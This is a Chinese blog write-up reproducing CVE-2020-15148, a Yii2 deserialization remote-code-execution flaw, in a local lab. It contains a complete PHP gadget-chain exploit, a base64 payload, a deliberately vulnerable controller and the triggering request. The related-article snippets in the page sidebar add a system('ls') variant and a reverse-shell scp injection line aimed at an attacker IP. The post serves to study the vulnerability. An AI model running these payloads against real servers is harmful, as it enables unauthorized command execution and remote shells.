CVE-2020-15148--Yii2 反序列化漏洞复现

最新推荐文章于 2023-03-30 17:14:01 发布
最新推荐文章于 2023-03-30 17:14:01 发布
阅读量1k 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: cve 安全漏洞 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/120473172
版权

目录

简介:

环境部署:

知识点:

分析:

复现:

参考链接:

其他问题:

简介:

Yii Framework是一个基于组件、用于开发大型Web应用的高性能 PHP 框架。Yii提供了今日Web 2.0应用开发所需要的几乎一切功能。Yii是最有效率的PHP框架之一。

Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。

环境部署:

下载地址:

https://github.com/yiisoft/yii2/releases/tag/2.0.37

下载这个yii-basic-app-2.0.37.tgz 

 修改/config/web.php文件17行cookieValidationKey,值可以为任何

进入目录(我的是放在了phpstudy的www目录下),执行 php yii serve

进入 http://localhost:8080/ 

知识点:

namespace:

PHP: 命名空间概述 - Manual

​​​​​​php中命名空间(namespace)的作用和使用_古语静水流深-CSDN博客​​​​​​

PHP命名空间(Namespace)的使用详解 - 酷越 - 博客园

call_user_func_array()

Yii2.0 路由(Route)的实现原理  [ 2.0 版本 ]

所谓路由是指URL中用于标识用于处理用户请求的module, controller, action的部分,一般情况下由 r 查询参数来指定。
如 http://www.digpage.com/index.php?r=post/view&id=100 ,表示这个请求将由PostController 的 actionView来处理。(主要首字母要大写)

__construct():当对象创建(new)时会自动调用。但在unserialize()时是不会自动调用的。

__destruct():当对象被销毁时会自动调用。

__call():是在对象上下文中调用不可访问的方法时触发

 

分析:

使用的poc:

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
 
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '1';
        }
    }
}
 
namespace Faker{
    use yii\rest\CreateAction;
 
    class Generator{
        protected $formatters;
 
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
 
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}

namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

我们从poc代码开始入手:

这里使用其他师傅一张图:

 第一步:new了一个yii\db\BatchQueryResult()类,那么就会调用这个类的__construct()方法

第二步:这个类的__construct()方法会new一个Faker\Generator()类,就又会调用Faker\Generator()类的__construct()方法,并把这个对象赋值给$_dataReader变量。

第三步:Faker\Generator()类的__construct()方法会new一个yii\rest\CreateAction()类,然后又调用yii\rest\CreateAction()类的__coustrcut()方法。并调用了run方法(这里用了 call_user_func_array后面会讲到),然后赋值给$this->formatters['close']。

第四步:反序列化时,类中变量的值我们是可控的;那么就可以通过yii\rest\CreateAction()类的__construct()方法中修改这些变量,将这些值改成命令,成功RCE。

思路有了,我们就看仔细看看源文件中的这些类:

yii\db\BatchQueryResult():

文件在:

vendor/yiisoft/yii2/db/BatchQueryResult.php:

在poc中

echo base64_encode(serialize(new yii\db\BatchQueryResult));

这句话执行完之后,会先调用yii\db\BatchQueryResult()类的__destruct()方法,这个方法会执行reset方法,因为前面我们讲$this->dataReader设置为了Faker\Generator()对象,

$this->_dataReader = new Generator;

所以就会进入if语句,执行Gnerator的close方法,因为没有这个方法所以会调用他的__call()方法。

Gnerator类

文件在:

vendor/fzaninotto/faker/src/Faker/Generator.php

 因为close是无参方法,所以__call中的$method是close,attributes为空,然后传参给format方法

继续跟进format方法。

这里因为传参,所以$formatter='close',$arguments=空

format方法中使用了call_user_func_array(),使用的方法为getFormatters('close')的返回值,参数在$arguments=空

继续跟进getFormatter(‘close’)方法,这个方法中if语句中的$formatters['close'],我们发现:

$formatters['close']是可控的,也就是说getFormatter方法的返回值是可控的。也就是说call_user_func_array这个函数的第一个参数可控,第二个参数为空;所以相当于我们现在能干两件事,1、调用yii2中任意的一个无参方法。2、调用原生php的类似phpinfo()这样的无参方法,但是第二种肯定不能RCE,因此还要在yii2中已有的无参方法中进行挖掘:

function \w+\(\)

 但是无参方法很多,这样不好找;

搜索含有call_user_function的无参函数:

function \w*\(\)\n? *\{(.*\n)+ *call_user_func

在大括号前需要有空格的,然后换行符\n 之后也需要空格的,加上这两块就能够找到了

 最后找到rest/CreateAction.php以及rest/IndexAction.php

这里分析CreatAction.php

那么poc中的下一步代入了一个无参数的方法去RCE。在前面的poc中说了formatters被赋值为:

 $this->formatters['close'] = [new CreateAction(), 'run'];

CreateAction类

文件在:

vendor/yiisoft/yii2/rest/CreatAction.php

 CreatAction()方法中的$this->checkAccess,$this->id我们都是可控的,那么就可以执行RCE了

复现:

复现的第一步,先自己添加一个反序列化的入口,在controllers目录下新建一个存在反序列化点的TestController.php

<?php
namespace app\controllers;
 
class TestController extends \yii\web\Controller
{
	public function actionTest($data){
		return unserialize(base64_decode($data));
	}
}
 
?>

然后使用poc输出需要的字符串:

TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

get传参(使用的知识是路由):

?r=test/test&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

成功RCE。 

参考链接:

CVE-2020-15148 Yii2反序列化RCE分析与复现 - FreeBuf网络安全行业门户

yii2框架 反序列化漏洞复现_feng的博客-CSDN博客_yii框架漏洞

其他问题:

 

 当闭合的时候如果在?>后面还有两行以上如42、43,或者在40行到?>直接还有代码时,执行时会报错。

 解决方法:

1:不使用?>结束闭合

 2:闭合后不要增加行数。

_Monica_
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-15148-bypasses:几条关于CVE-2020-15148yii2反序列化)的绕过
03-09
CVE-2020-15148绕过 几条关于CVE-2020-15148yii2反序列化)的绕过 poc1 这一个是在2.0.37版本可利用的,2.0.38恢复了这,也就是这个被分配了CVE-2020-15148,后面的三个是绕过 <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } } namespace Faker{ use yii\rest\CreateAction; cla
CVE-2020-15778漏洞复现
热门推荐
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
CVE-2020-7961 Liferay Portal 代码执行漏洞复现
爱国小白帽
04-28 5304
CVE-2020-7961 Liferay Portal 代码执行漏洞复现 原创 shadow1ng [雷神众测](javascript:void(0)???? 今天 声明 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内...
CVE-2020-15148 Yii反序列化漏洞复现
绮洛Ki1ro的博客
08-05 834
CVE-2020-15148 Yii反序列化漏洞复现
网络安全】浅谈CVE-2020-15148漏洞
m0_71746299的博客
03-30 384
今天给大家带来的是CVE-2020-15148漏洞的简单分析,整体看下来还是很简单的,我们需要注意如何调用的魔术方法以及如何进行RCE,有兴趣的小伙伴可以自己去搭建环境进行测试,喜欢本文的朋友希望可以一键三连支持一下。
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8020
多次跳转导致的ssrf
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1730
yii2框架 反序列化漏洞复现
yii2反序列化漏洞总结
unexpectedthing的博客
03-29 4553
文章目录yii2框架 反序列化漏洞复现yii 框架搭建过程CVE-2020-15148复现链子2链子3链子4链子5链子6参考链接 yii2框架 反序列化漏洞复现 yii 框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii
yii2框架 反序列化漏洞复现
feng的博客
02-16 3689
前言 最近学习PHP反序列化的时候遇到了yii2反序列化的利用,就顺便搭了一下环境,跟着网上各种大师傅们的文章进行了一波复现和学习,提高自己代码审计的能力。 漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize()
php探针入侵,【防护方案】Yii2 反序列化远程命令执行漏洞 (CVE-2020-15148)
weixin_36012511的博客
03-28 786
一、综述近日监测到,Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。Yii2 是...
yii php framework 漏洞,yii框架异常处理导致的xss.md
weixin_39990410的博客
04-13 1022
最近XSS扫描器发现了一些奇怪的漏洞,对一些特征归类,查询,发现是属于yii 1.x框架。Yii是一个免费的,开源的,基于PHP的Web应用程序开发框架虽然YII 已经发布了2.x,但1.x的使用量还是很大的复现下载yii 1.xgit clone https://github.com/yiisoft/yii运行自带的blog demo当请求头带有X-Requested-With: XMLHttp...
CVE-2020-11890:CVE-2020-11890
03-10
香港制造 CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发RCE。 Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80 hoangkien1020 / joomla:3.9.16 #Step 3:通过端口8080访问您的域/ IP: 带有凭据的此图像内 用户名密码 MySQL:root:root(可以通过IP:8080 / phpmyadmin访问) s
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
Yii2 反序列化漏洞(CVE-2020-15148)复现
锋刃科技的博客
12-16 9262
漏洞概述 Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境搭建 到github上下载yii2的2.0.37版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 然后修改/config/web.php文件17行cookieValidationKey,可以随便定义 ...
15-PHP代码审计——yii 2.0.37反序列化漏洞
网络安全
06-06 1173
Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,如果程序内部调用了unserialize() 反序列化时,那么程序就可能存在反序列化漏洞,攻击者可通过构造特定的恶意请求执行任意命令。 影响版本: yii2 v2.0.37版本以下 环境: yii-basic-app-2.0.37.tgz php7.0以上 poc: http://www.yii2.com/web/index.php?r=test/sss&.
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
最新发布
07-28
关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值